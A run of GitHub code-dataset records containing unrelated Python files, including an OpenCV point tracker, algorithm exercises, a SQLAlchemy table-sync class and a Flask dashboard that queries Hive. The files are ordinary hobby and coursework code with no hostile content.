super().__init__(msg)\n\ndef is_jpeg(buffer):\n return magic.from_buffer(buffer,mime=True) in [ MIME.JPEG ]\n\ndef cv2_track_frame(*,frame0, frame1, trackpoints):\n \"\"\"\n Summary - Takes the original marked marked_frame and new frame and returns a frame that is annotated.\n :param: frame0 - cv2 image of the previous frame in CV2 format\n :param: frame1 - cv2 image of the current frame in CV2 format\n :param: trackpoints - array of trackpoints (dicts of x,y and label)\n :return: array of trackpoints\n\n \"\"\"\n winSize=(15, 15)\n maxLevel=2\n criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)\n tpts = np.array([[pt['x'],pt['y']] for pt in trackpoints],dtype=np.float32)\n\n try:\n gray_frame0 = cv2.cvtColor(frame0, cv2.COLOR_BGR2GRAY)\n gray_frame1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\n point_array_out, status_array, err = cv2.calcOpticalFlowPyrLK(gray_frame0, gray_frame1, tpts, None,\n winSize=winSize, maxLevel=maxLevel, criteria=criteria)\n trackpoints_out = []\n for (i,pt) in enumerate(trackpoints):\n if status_array[i]==1:\n trackpoints_out.append({'x':point_array_out[i][0],\n 'y':point_array_out[i][1],\n 'status':int(status_array[i]),\n 'err':float(err[i]),\n 'label':pt['label']})\n print(\"tpts=\",tpts)\n print(\"point_array_out=\",point_array_out)\n print(\"status_array=\",status_array,\"err=\",err)\n print(\"trackpoints_out=\",trackpoints_out)\n print(\"\")\n\n except cv2.error:\n trackpoints_out = []\n\n return trackpoints_out\n\ndef cv2_label_frame(*, frame, trackpoints, frame_label=None):\n \"\"\"\n :param: frame - cv2 frame\n :param: trackpoints - array of dicts\n :param frame_label - if present, label for frame number (can be int or string)\n \"\"\"\n\n #width = len(frame)\n height = len(frame[0])\n\n # use the points to annotate the colored frames. write to colored tracked video\n # https://stackoverflow.com/questions/55904418/draw-text-inside-circle-opencv\n for point in trackpoints:\n cv2.circle(frame, (int(point['x']), int(point['y'])), 3, RED, -1) # pylint: disable=no-member\n\n if frame_label is not None:\n text = str(frame_label)\n WHITE = (255,255,255)\n text_size, _ = cv2.getTextSize(text, TEXT_FACE, TEXT_SCALE, TEXT_THICKNESS)\n text_origin = ( TEXT_MARGIN, height-TEXT_MARGIN)\n cv2.rectangle(frame, text_origin, (text_origin[0]+text_size[0],text_origin[1]-text_size[1]), RED, -1)\n cv2.putText(frame, text, text_origin, TEXT_FACE, TEXT_SCALE, WHITE, TEXT_THICKNESS, cv2.LINE_4)\n\n\ndef extract_frame(*, movie_data, frame_number, fmt):\n \"\"\"Download movie_id to a temporary file, find frame_number and return it in the request fmt.\n \"\"\"\n with tempfile.NamedTemporaryFile(mode='ab') as tf:\n tf.write(movie_data)\n tf.flush()\n cap = cv2.VideoCapture(tf.name)\n\n # skip to frame_number (first frame is #0)\n for fn in range(frame_number+1):\n ret, frame = cap.read()\n if not ret:\n return None\n if fn==frame_number:\n if fmt=='CV2':\n return frame\n elif fmt=='jpeg':\n with tempfile.NamedTemporaryFile(suffix='.jpg',mode='w+b') as tf:\n cv2.imwrite(tf.name, frame, [int(cv2.IMWRITE_JPEG_QUALITY), 90])\n tf.seek(0)\n return tf.read()\n else:\n raise ValueError(\"Invalid fmt: \"+fmt)\n raise RuntimeError(\"invalid frame_number\")\n\ndef track_movie(*, engine_name, engine_version=None, moviefile_input, input_trackpoints, moviefile_untracked=None, moviefile_output, frame_start=0):\n \"\"\"\n Summary - takes in a movie(cap) and returns annotatted movie with red dots on all the trackpoints.\n Draws frame numbers on each frame\n :param: engine - the engine to use. CV2 is the only supported engine at the moment.\n :param: moviefile_input - file name of an MP4 to track. Must not be annotated. CV2 cannot read movies from memory; this is a known problem.\n :param: moviefile_output - file name of the tracked output, with annotations.\n :param: trackpoints - a list of dictionaries {'x', 'y', 'label', 'frame_number'} to track. Those before frame_start will be copied to the output.\n :param: frame_start - the frame to start tracking out (frames 0..(frame_start-1) are just copied to output)\n :return: dict 'output_trackpoints' = [frame][pt#][0], [frame][pt#][1]\n\n \"\"\"\n if engine_name!=Engines.CV2:\n raise RuntimeError(f\"Engine_name={engine_name} engine_version={engine_version} but this only runs with CV2\")\n\n cap = cv2.VideoCapture(moviefile_input)\n ret, current_frame = cap.read()\n\n # should be movie name + tracked\n\n # Get video properties\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n # Create a VideoWriter object to save the output video\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter(moviefile_output, fourcc, fps, (width, height))\n\n output_trackpoints = []\n for frame_number in range(1_000_000):\n prev_frame = current_frame\n ret, current_frame = cap.read()\n if not ret:\n break\n\n # Get the trackpoints for the current frame if this was previously tracked or is the first frame to track\n if frame_number <= frame_start:\n current_trackpoints = [tp for tp in input_trackpoints if tp['frame_number']==frame_number]\n\n # If this is a frame to track, then track it\n if frame_number >= frame_start:\n current_trackpoints = cv2_track_frame(frame0=prev_frame, frame1=current_frame, trackpoints=current_trackpoints)\n\n # Label the output and write it\n cv2_label_frame(frame=current_frame, trackpoints=current_trackpoints, frame_label=frame_number)\n out.write(current_frame)\n\n # Add the trackpionts to the output list, giving each a frame number\n output_trackpoints.extend( [ {**tp, **{'frame_number':frame_number}} for tp in current_trackpoints] )\n cap.release()\n out.release()\n return {'output_trackpoints':output_trackpoints}\n\n\n# The trackpoint is at (138,86) when the image is scaled to a width: 320 height: 240\n\nif __name__ == \"__main__\":\n # the only requirement for calling track_movie() would be the \"control points\" and the movie\n parser = argparse.ArgumentParser(description=\"Run Track movie with specified movies and initial points\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--engine',default='CV2')\n parser.add_argument(\n \"--moviefile\", default='tests/data/2019-07-12 circumnutation.mp4', help='mpeg4 file')\n parser.add_argument(\n \"--points_to_track\", default='[{\"x\":138,\"y\":86,\"label\":\"mypoint\"}]', help=\"list of points to track as json 2D array.\")\n parser.add_argument('--outfile',default='tracked_output.mp4')\n args = parser.parse_args()\n\n # Get the trackpoints\n trackpoints = json.loads(args.points_to_track)\n # Make sure every trackpoint is for frame 0\n trackpoints = [ {**tp,**{'frame_number':0}} for tp in trackpoints]\n\n res = track_movie(engine_name=args.engine, moviefile_input=args.moviefile, input_trackpoints=trackpoints, moviefile_output=args.outfile)\n print(\"results:\")\n print(json.dumps(res,default=str,indent=4))\n","repo_name":"Plant-Tracer/webapp","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16016920168","text":"\"\"\"\nDijkstra\n\n1. 출발 노드 설정\n2. 최단 거리 테이블 초기화\n3. 방문하지 않은 노드 중에서 최단 거리가 가장 짧은 노드를 선택\n4. 해당 노드를 거쳐 다른 노드로 가는 비용을 계산하고 최단 거리 테이블 갱신\n5. 3,4 반복\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m = map(int, input().split())\n\nstart = int(input())\n\ngraph = [[] for _ in range(n + 1)]\n\nvisited = [False] * (n + 1)\n\ndistance = [INF] * (n + 1)\n\nfor _ in range(m):\n a, b, c = map(int , input().split())\n graph[a].append((b, c))\n\ndef get_smallest_node():\n min_value = INF\n index = 0\n for i in range(1, n+1):\n if distance[i] < min_value and not visited[i]: # 방문하지 않은 노드 중에서 거리가 가장 작은 노드\n min_value = distance[i]\n index = i\n return index\n\ndef dijkstra(start):\n distance[start] = 0\n visited[start] = True\n for j in graph[start]: # start node와 연결된 node들의 거리 비용 초기화\n distance[j[0]] = j[1]\n \n for i in range(n - 1):\n now = get_smallest_node()\n visited[now] = True\n\n for j in graph[now]:\n cost = distance[now] + j[1]\n if cost < distance[j[0]]:\n distance[j[0]] = cost\n\ndijkstra(start)\n\nfor i in range(1, n + 1):\n if distance == INF:\n print(\"INFINITY\")\n else:\n print(distance[i])\n \n \n","repo_name":"BCAA-Algorithm-Study/algorithm-study","sub_path":"book/ch09/chj/9-1.py","file_name":"9-1.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"29705819064","text":"# -*- coding:utf-8 -*-\n__author__ = 'nathan'\n\nimport collections\n\nfrom .base import BaseStore\nfrom sqlalchemy.sql import text, select, and_, or_, func\nfrom sqlalchemy import MetaData\nfrom ..utils.dt import get_day_range\n\nclass DatabaseStore(BaseStore):\n \"\"\"\n It stands for a table or a sql result\n \"\"\"\n\n def __init__(self, engine, table, schema=None, columns=None, where=None, split_by=None):\n \"\"\"\n create a new DatabaseStore, which stand for a table from a rdbms\n\n Parameters:\n - `engine`: the sqlalchemy engine instance\n - `schema`: database schema\n - `table`: the table that needs to be synced\n _ `columns`: the column that needs to be synced, it should be str(one column),\n comma split str(multi columns) or a list of str\n - `where`: a where clouse, only the condition\n - `split_by`: when sync the table concurrently, which cloumn should it be splitted by\n\n \"\"\"\n self.__engine = engine\n self.__schema = schema\n self.__table = table\n self.__splits = None\n self.__columns = self._format_columns(columns)\n self.__where = self._format_where(where)\n self.__split_by = split_by if split_by is not None else self._get_split_by()\n\n def sql(self):\n return str(self.__select())\n\n def _format_columns(self, columns):\n \"\"\"\n format comma split str, list or python iterable to text wrapped list\n\n Arguments:\n - `columns`: a list or python iterable, or comma split str\n \"\"\"\n if isinstance(columns, str):\n return (text(col) for col in columns.strip().split(\",\"))\n else:\n return (text(col) for col in columns) \\\n if columns is not None and len(columns) > 0 \\\n else [text(\"*\")]\n\n def _format_where(self, where):\n \"\"\"\n format where closure\n \"\"\"\n where = \"\" if where is None else where\n return where\n\n def _select_all(self):\n \"\"\"\n select all table\n \"\"\"\n sel = select([text(\"*\")]).select_from(text(self.__table))\n return sel\n\n\n def _select_incr(self,create_column, create_start_time, create_end_time, update_column, update_start_time, update_end_time):\n sel = select([text(\"*\")]).where(\n or_(text(\"%s between '%s' and '%s'\" % (create_column, create_start_time, create_end_time)),\n text(\"%s between '%s' and '%s'\" % (update_column, update_start_time, update_end_time)))\n ).select_from(text(self.__table))\n\n return sel\n\n def _select(self):\n \"\"\"\n select the table with the given columns and where closure\n \"\"\"\n sel = select(self.__columns).\\\n where(text(self.__where)).\\\n select_from(text(self.__table))\n return sel\n\n def _select_with_split_by(self, start, end):\n select(text(self.__columns)).\\\n where(\n and_(\n text(self.__where),\n text(\":split_by >= :start\"),\n text(\":split_by < :end\"),\n )\n ).\\\n select_from(text(self.__table)).params(split_by=self.__split_by, start=start, end=end)\n\n def _count(self):\n sel = select([func.count(text(\"1\"))]).\\\n where(text(self.__where)).\\\n select_from(text(self.__table))\n return self.__engine.execute(sel).fetchone()[0]\n\n def count(self):\n if not hasattr(self, 'rownums'):\n self.rownums = self.__count()\n return self.rownums\n\n __len__ = count\n\n def __iter__(self):\n return self\n\n def __next__(self):\n result = self.__engine.execute(self._select())\n for row in result:\n yield collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n\n next = __next__\n\n def get_split(self):\n pass\n\n def get(self, partition=None):\n if partition is None:\n partition = self._select()\n result = self.__engine.execute(partition)\n for row in result:\n yield collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n\n def put(self, iterable):\n for row in iterable:\n # TODO: the data show be insert into database\n self.__engine.insert(row)\n\n def get_local(self, local_path, merge=False):\n pass\n\n def _get_split_by(self):\n meta = MetaData()\n meta.reflect(bind=self.__engine)\n _table = meta.tables[self.__table]\n\n primary_keys = _table.primary_key.columns\n if len(primary_keys) == 1:\n return primary_keys.keys()[0].lower()\n else:\n return None\n\n def _get_columns(self):\n meta = MetaData()\n meta.reflect(bind=self.__engine)\n _table = meta.tables[self.__table]\n\n keys = _table.columns.keys()\n return (key.lower() for key in keys)\n\n def _get_split_by_upper_boundary(self, rownums_per_split, low_boundary=None):\n where = \"\" if low_boundary is None else self.__split_by + \" >= \" + str(low_boundary)\n\n sel = select(self.__columns).\\\n where(\n and_(\n text(self.__where),\n text(where)\n )\n ).\\\n order_by(self.__split_by).offset(rownums_per_split).limit(1).\\\n select_from(text(self.__table))\n\n # upper_boundary\n row = self.__engine.execute(sel).fetchone()\n\n if row is not None:\n lowered_row = collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n return lowered_row[self.__split_by]\n\n def _get_split_by_boundaries(self, split_nums):\n \"\"\"\n return like [(None, 2), (2, 3), (3, None)]\n \"\"\"\n\n low_boundary = None\n rownums_per_split = self.count()/split_nums\n\n boundaries = list()\n for i in range(split_nums):\n if i == split_nums - 1:\n boundaries.append((low_boundary, None))\n break\n\n upper_boundary = self._get_split_by_upper_boundary(rownums_per_split, low_boundary)\n boundaries.append((low_boundary, upper_boundary))\n low_boundary = upper_boundary\n\n return boundaries\n\n def split(self, split_nums=1):\n \"\"\"\n\n Arguments:\n - `split_nums`: if split_nums = 1, means no need to split, return the whole sql\n \"\"\"\n if 1 < split_nums <= self.count():\n boundaries = self._get_split_by_boundaries(split_nums)\n return boundaries\n else:\n self.sql()\n\n def all(self):\n connection = self.__engine.connect()\n result = connection.execute(self._select_all())\n for row in result:\n yield collections.OrderedDict((key.lower(), row[key]) for key in row.keys())\n\n def incr_by_day(self):\n starttime, endtime = get_day_range()\n columns = self._get_columns()\n\n if 'createtime' in columns:\n create_column = 'createtime'\n update_column = 'updatetime'\n else:\n create_column = 'create_datetime'\n update_column = 'update_datetime'\n\n res = self.__engine.execute(\n self._select_incr(create_column=create_column, create_start_time=str(starttime),\n create_end_time=str(endtime), update_column=update_column,\n update_start_time=str(starttime), update_end_time=str(endtime)))\n\n for record in res:\n yield record\n\n def incr_by_hour(self):\n pass\n","repo_name":"zhoubangtao/dbsync","sub_path":"dbsync/stores/rdbms.py","file_name":"rdbms.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29474285576","text":"# Setup detectron2 logger\nimport detectron2\nfrom detectron2.utils.logger import setup_logger\n\nsetup_logger()\n\nimport json\nimport os\nimport random\n\nimport cv2\nimport deepdisc\nimport numpy as np\nfrom deepdisc.data_format.image_readers import DC2ImageReader\n\n\ndef flatten_dc2_stamps(ddicts, image_reader, key_mapper):\n \"\"\"Reads in large cutouts and creates postage stamp images centered on individual objects with i<25.3.\n Flattens these images+metadata into one tabular dataset. Ignores segmentation maps.\n\n Parameters\n ----------\n ddicts : list[dicts]\n The metadata dictionaries for large cutouts with multiple objects.\n\n Returns\n -------\n flattened_data : np array\n The images + metadata that have now been flattened into a tabular array.\n Each row has 98317 columns (6x128x128 + 13 metadata values)\n \"\"\"\n\n i = 0\n images = []\n metadatas = []\n\n for d in ddicts:\n filename = d[f\"filename\"]\n for a in d[\"annotations\"]:\n new_dict = {}\n new_dict[\"image_id\"] = 1\n new_dict[\"height\"] = 128\n new_dict[\"width\"] = 128\n\n x = a[\"bbox\"][0]\n y = a[\"bbox\"][1]\n w = a[\"bbox\"][2]\n h = a[\"bbox\"][3]\n\n xnew = x + w // 2 - 64\n ynew = y + h // 2 - 64\n\n if (\n xnew < 0\n or ynew < 0\n or xnew + 128 > d[\"height\"]\n or ynew + 128 > d[\"height\"]\n or a[\"mag_i\"] > 25.3\n ):\n continue\n\n bxnew = x - (x + w // 2 - 64)\n bynew = y - (y + h // 2 - 64)\n\n key = key_mapper(d)\n\n image = image_reader(key)\n image = np.transpose(image, axes=(2, 0, 1))\n\n imagecut = image[:, ynew : ynew + 128, xnew : xnew + 128]\n\n images.append(imagecut.flatten())\n\n metadata = [\n 128,\n 128,\n 6,\n i,\n bxnew,\n bynew,\n w,\n h,\n 1,\n a[\"category_id\"],\n a[\"redshift\"],\n a[\"obj_id\"],\n a[\"mag_i\"],\n ]\n metadatas.append(metadata)\n i += 1\n\n images = np.array(images)\n metadatas = np.array(metadatas)\n\n flattened_data = []\n for image, metadata in zip(images, metadatas):\n flatdat = np.concatenate((image, metadata))\n flattened_data.append(flatdat)\n\n flatdat = np.array(flattened_data)\n flatdatnostars = flatdat[flatdat[:, -3] > 0]\n\n return flatdatnostars\n\n\ndef flatten_dc2_large(ddicts, key_mapper, image_reader):\n images = []\n for d in ddicts:\n fn = key_mapper(d)\n image = image_reader(fn)\n image = np.transpose(image, axes=(2, 0, 1))\n images.append(image.flatten())\n return np.array(images)\n","repo_name":"LSSTDESC/rail_deepdisc","sub_path":"src/rail/deepdisc/flatten.py","file_name":"flatten.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39873082942","text":"#Direction words: north, south, east, west, down, up, left, right, back.\r\n#Verbs: go, stop, kill, eat.\r\n#Stop words: the, in, of, from, at, it\r\n#Nouns: door, bear, princess, cabinet.\r\n#Numbers: any string of 0 through 9 characters.\r\n\r\nlex = {}\r\nlex.update(dict.fromkeys(['north','east','west','down','south','up','left','right','back'], 'direction'))\r\nlex.update(dict.fromkeys(['take','go','kill','eat','stop','hide','enter','exit','pickup','grab','leave', 'search', 'look','type'], 'verb'))\r\nlex.update(dict.fromkeys(['the','in','of','from','at','it','through','to'], 'stop'))\r\nlex.update(dict.fromkeys(['door','princess','cabinet','bear','closet','scalpel','doorway', 'Escape', 'Office', 'Weaponry', 'pistol', 'machine', 'grenade','escape', 'office', 'computer', 'file', 'weaponry','room'],'noun'))\r\n\r\ndef convert_number(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return None\r\ndef scan(stuff): \r\n words = stuff.split()\r\n sentence = []\r\n for x in words:\r\n if x in lex:\r\n word = (lex[x], x)\r\n sentence.append(word)\r\n elif convert_number(x) != None:\r\n word = ('number', int(x))\r\n sentence.append(word)\r\n else:\r\n word = ('error', x)\r\n sentence.append(word)\r\n return sentence\r\n\r\n","repo_name":"jvandebroek/Python-Learning","sub_path":"ex50/Game/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41609903157","text":"import cgi\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n\nclass Userinfo(db.Model):\n author = db.UserProperty()\n content = db.StringProperty()\n loc_lat = db.StringProperty()\n loc_long = db.StringProperty()\n date = db.DateTimeProperty(auto_now_add=True)\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n self.response.out.write('')\n self.response.out.write(\"\"\"\n
\n
\n
\n
\n
\n
\n \n \"\"\")\n\nclass Guestbook(webapp.RequestHandler):\n def post(self):\n userinfo = Userinfo(key_name=self.request.get('content'))\n\n if users.get_current_user():\n userinfo.author = users.get_current_user()\n\n userinfo.content = self.request.get('content')\n userinfo.loc_lat = self.request.get('latitude')\n userinfo.loc_long = self.request.get('longitude')\n userinfo.put()\n self.redirect('/GID/')\n\n\"\"\"class Latitude(webapp.RequestHandler):\n def post(self):\n userinfo = Userinfo()\n\n if users.get_current_user():\n userinfo.author = users.get_current_user()\n\n userinfo.loc_lat = self.request.get('latitude')\n userinfo.put()\n self.redirect('/GID/')\n\nclass Longitude(webapp.RequestHandler):\n def post(self):\n userinfo = Userinfo()\n\n if users.get_current_user():\n userinfo.author = users.get_current_user()\n\n userinfo.loc_long = self.request.get('longitude')\n userinfo.put()\n self.redirect('/GID/')\n\"\"\"\napplication = webapp.WSGIApplication(\n [('/GID/', MainPage),\n ('/GID/sign', Guestbook),\n# ('/GID/loc_lat', Latitude),\n# ('/GID/loc_long', Longitude)\n ],\n debug=True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ProjPossibility/ss12-gps-child-tracker","sub_path":"ss12-gps-child-tracker/ss12-gps-child-tracker-pysrv/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"26860173069","text":"#!/usr/bin/env python3\n\nimport itertools\nimport os\nimport sys\n\nsys.path.append(os.path.join('..', 'intcode'))\n\nimport intcode\n\nwith open(sys.argv[1]) as f:\n line = f.readline().strip()\n memory = [int(x) for x in line.split(',')]\n\nmax_signal = None\nfor phases in itertools.permutations([0, 1, 2, 3, 4]):\n signal = 0\n for i in range(5):\n inputs = [phases[i], signal]\n program = intcode.Program(memory, input_values = inputs)\n program.run()\n signal = program.outputs[0]\n if max_signal is None or signal > max_signal:\n print('Phases {} produced signal {}'.format(phases, signal))\n max_signal = signal\n","repo_name":"pak21/aoc2019","sub_path":"07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43334061249","text":"# Write a Python code to calculate LCM of (25,55)\nnum1, num2 = 25, 55\n\n# To choose the greater number\nif (num1 > num2):\n greater = num1\nelse:\n greater = num2\n\nwhile(True):\n # To find LCM\n if(greater % num1 == 0 and greater % num2 == 0):\n print('The LCM of', num1, 'and', num2, 'is', greater)\n break\n greater += 1\n","repo_name":"anilmhrzn/PythonTrainingAssignment","sub_path":"assingment1/Ques5.py","file_name":"Ques5.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18832809473","text":"'''\nfinding the Kth smallest element from the array using quick select which is based on quich sort DS.\n'''\n####NOTE, I'THINK THAT IT IS QUICK SELECT ALGO, BUT IT MAY BE EVEN BETTER\n\nclass quickSelect:\n def __init__(self, arr, k):\n self.arr = arr\n self.k = k\n self.total = 0\n self.quickMod()\n print(\"answer: \", self.answer)\n\n def quickMod(self):\n lastQs = None\n self.answer = None\n while True:\n lastQs = self.sorter(self.arr)\n print(\"self.total: \", self.total)\n if lastQs[\"middle\"] == True:\n self.answer = lastQs[\"main\"]\n break\n else:\n if lastQs[\"right\"] == True:\n self.total = self.total + 1 #bcz, main element will also be counted now\n self.arr = lastQs[\"rightArr\"]\n else:\n self.total = self.total - len(lastQs[\"leftArr\"])\n self.arr = lastQs[\"leftArr\"]\n\n def sorter(self, elements):\n ln = len(elements)\n qs = {\n \"main\": None,\n \"leftArr\": [],\n \"rightArr\": [],\n \"middle\": False,\n \"left\": False,\n \"right\": False\n }\n if ln == 0:\n return qs\n qs[\"main\"] = elements[ln-1]\n if ln == 1:\n qs[\"middle\"] = True\n return qs\n for i in range(0, ln-1):\n if elements[i] <= qs[\"main\"]:\n qs[\"leftArr\"].append(elements[i])\n self.total = self.total + 1\n else:\n qs[\"rightArr\"].append(elements[i])\n\n if self.total == self.k - 1:\n qs[\"middle\"] = True\n elif self.total > self.k - 1:\n qs[\"left\"] = True\n elif self.total < self.k - 1:\n qs[\"right\"] = True\n\n return qs\n\nquickSelect([5, 9, 10, 1, 3, 8, 12, 7], 3)","repo_name":"shubhamsinghrathi/algorithms","sub_path":"array/quickSelect.py","file_name":"quickSelect.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42162141141","text":"from flask import *\n\napp = Flask(__name__)\nfrom pyhive import hive\n\nconn = hive.Connection(host='192.168.10.201', port=10000, username='root', database='spark')\ncursor = conn.cursor()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home_page():\n cursor.execute(\"select success, faile from spark.ads_sucess_faile_num\")\n chart1_data = list(cursor)\n print(chart1_data)\n\n cursor.execute(\"select days, pv, uv from spark.ads_pv_uv_num\")\n chart4_data = [[], [], []]\n for line in list(cursor):\n chart4_data[0].append(line[0])\n chart4_data[1].append(line[1])\n chart4_data[2].append(line[2])\n print(chart4_data)\n\n cursor.execute(\"select * from spark.ads_class_sucess_faile_num\")\n tmp = list(cursor)\n # print(tmp)\n chart_class = []\n if len(tmp) == 0:\n chart_class.append(('117010801', 0, 0))\n chart_class.append(('117010802', 0, 0))\n elif len(tmp) == 1 and tmp[0][0] == '117010801':\n chart_class.append(tmp[0])\n chart_class.append(('117010802', 0, 0))\n elif len(tmp) == 1 and tmp[0][0] == '117010802':\n chart_class.append(('117010801', 0, 0))\n chart_class.append(tmp[0])\n else:\n chart_class = tmp\n # chart_class = list(cursor)\n # tmp = []\n # if chart_class[0][0] == '117010801' and chart_class[0][1] != '117010802':\n # tmp.append(chart_class[0])\n # tmp.append(('117010802', 0, 0))\n # elif chart_class[0][0] != '117010801' and chart_class[0][1] != '117010802':\n # tmp.append(('117010801', 0, 0))\n # tmp.append(('117010802', 0, 0))\n # elif chart_class[0][0] == '117010802':\n # tmp.append(('117010801', 0, 0))\n # tmp.append(chart_class[1])\n print(chart_class)\n\n cursor.execute(\"select * from spark.ads_code_sucess_faile_num\")\n chart3_data = [[], [], []]\n for line in list(cursor):\n chart3_data[0].append(line[0])\n chart3_data[1].append(line[1])\n chart3_data[2].append(line[2])\n print(chart3_data)\n\n cursor.execute(\n \"select userid,student_name,class_id,code_number,job_success_distinct_number from spark.ads_student_sort_chart1_table1 limit 5\")\n tmp = list(cursor)\n table_left = []\n if len(tmp) == 0:\n table_left.append(('-', '-', '-', 0, 0))\n else:\n table_left = tmp\n print(table_left)\n\n cursor.execute(\n \"select userid,student_name,class_id,code_number,job_success_distinct_number from spark.ads_student_sort_table2 limit 5\")\n table_right = list(cursor)\n print(table_right)\n\n return render_template('home_page.html', chart1_data=chart1_data, chart4_data=chart4_data, chart_class=chart_class,\n chart3_data=chart3_data, table_left=table_left, table_right=table_right)\n\n\n@app.route('/chart1', methods=['GET', 'POST'])\ndef chart1():\n cursor.execute(\"select * from spark.ads_student_sort_chart1_table1\")\n data = list(cursor)\n\n return render_template(\"chart1.html\", data=data)\n\n\n@app.route('/chart2', methods=['GET', 'POST'])\ndef chart2():\n cursor.execute(\"select userid,student_name,class_id,academy,profession,submit_number,code_number,day \"\n \"from spark.dws_student_summary_f where class_id='117010801'\")\n data = list(cursor)\n\n return render_template(\"chart2.html\", data=data)\n\n\n@app.route('/chart3', methods=['GET', 'POST'])\ndef chart3():\n cursor.execute(\"select * from spark.ads_code_chart3\")\n data = list(cursor)\n\n return render_template(\"chart3.html\", data=data)\n\n\n@app.route('/chart4', methods=['GET', 'POST'])\ndef chart4():\n cursor.execute(\"select * from spark.ads_pv_uv_num\")\n data = list(cursor)\n\n return render_template(\"chart4.html\", data=data)\n\n\n@app.route('/chart5', methods=['GET', 'POST'])\ndef chart5():\n cursor.execute(\"select userid,student_name,class_id,academy,profession,submit_number,code_number,day \"\n \"from spark.dws_student_summary_f where class_id='117010802'\")\n data = list(cursor)\n\n return render_template(\"chart5.html\", data=data)\n\n\n@app.route('/chart6', methods=['GET', 'POST'])\ndef chart6():\n cursor.execute(\"select * from spark.ads_student_sort_table2\")\n data = list(cursor)\n\n return render_template(\"chart6.html\", data=data)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=30001, host='192.168.10.4')\n","repo_name":"cyf-99/spark-On-Kubernetes","sub_path":"main_hive.py","file_name":"main_hive.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27045998362","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n roman = ''\n symb_dict = {1000: 'M', 900: 'CM', 500: 'D', 400: 'CD', 100: 'C', 90: 'XC', 50: 'L', 40: 'XL', 10: 'X', 9: 'IX',\n 5: 'V', 4: 'IV', 1: 'I'}\n for i in symb_dict.keys():\n while num >= i:\n num -= i\n roman += symb_dict[i]\n return roman\n\n\nprint(Solution().intToRoman(3999))\n","repo_name":"XinweiChai/leetcode_problems","sub_path":"python/problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22460734561","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\" DFS approach.\n Time: O(n)\n Space: O(n)\n \"\"\"\n if not grid or not grid[0]:\n return 0\n \n size_r = len(grid)\n size_c = len(grid[0])\n counts = 0\n visited = set()\n\n def dfs(r, c):\n if (r, c) in visited:\n return 0\n \n visited.add((r, c))\n if grid[r][c] == '0':\n return 0\n \n for n_r, n_c in get_moves(r, c):\n dfs(n_r, n_c)\n return 1\n \n def get_moves(r, c):\n dirs = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n res = []\n for d_r, d_c in dirs:\n n_r, n_c = r + d_r, c + d_c\n if n_r >= 0 and n_r < size_r and n_c >= 0 and n_c < size_c:\n res.append((n_r, n_c))\n return res\n \n for row in range(size_r):\n for col in range(size_c):\n counts += dfs(row, col)\n return counts","repo_name":"hsuanhauliu/leetcode-solutions","sub_path":"medium/number-of-islands/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7839815131","text":"# for loop\nfor i in range(10):\n print(i)\n\n# range() :-\n# it actually creates a list which for loop iterates over\n# 3 parametes, start, stop, step\n\nlist = [1, 2, 3, 4, 5]\n\nfor elem in list: \n print(elem)\n\nfor i in range(len(list)):\n print(i)\n\nfor i, elem in enumerate(list):\n print(i, elem)\n\n\n\n### While Loop\n\ni = 0\nwhile i < 10:\n print(i)\n i += 